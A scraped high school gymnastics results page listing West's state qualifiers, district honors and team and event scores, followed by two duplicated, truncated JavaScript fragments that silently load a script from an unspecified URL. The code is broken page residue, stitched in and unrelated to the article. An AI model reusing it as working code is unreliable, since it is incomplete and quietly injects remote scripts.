Gymnastics

COY Mardi Dagley Sends 3 West Gymnast to State!

*West Gymnastics has 3 State Qualifiers!
Olivia Leonard (all-around, vault, bars, floor)
Ramiah Curry (beam, alternate on floor and all around)
Addy Shultz (beam)

**Madelyn Power and the 3 qualifiers were named to the All District team.

***Mardi Dagley named District Coach of the Year.

Congrats Ladies! #WestPride

Team (out of 15)
1 Turpin-141
2 Anderson- 140.40
3 Lakota West- 140.05
4 Centerville- 134.2
5 Beavercreek-133.45
6 Miamisburg- 128.775
7 Troy- 125.975
8 Lakota East- 122.925

All Around
1 Abby Pitts (Anderson)- 36.25
2 Olivia Leonard- 35.95
7 Ramiah Curry- 35.00
10 Madelyn Power- 34.575

Vault
4 Olivia Leonard- 9.025
8 Ramiah Curry- 8.475
10 Madeline Power- 8.275

Bars
4 Olivia Leonard- 9.0
9 Madelyn Power- 8.675

Beam
1  Addy Shultz- 9.0
2 Ramiah Curry- 9.0
8 Olivia Leonard- 8.6
9 Madelyn Power- 8.575

Floor
5 Olivia Leonard 9.325
7 Ramiah Curry 9.25

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts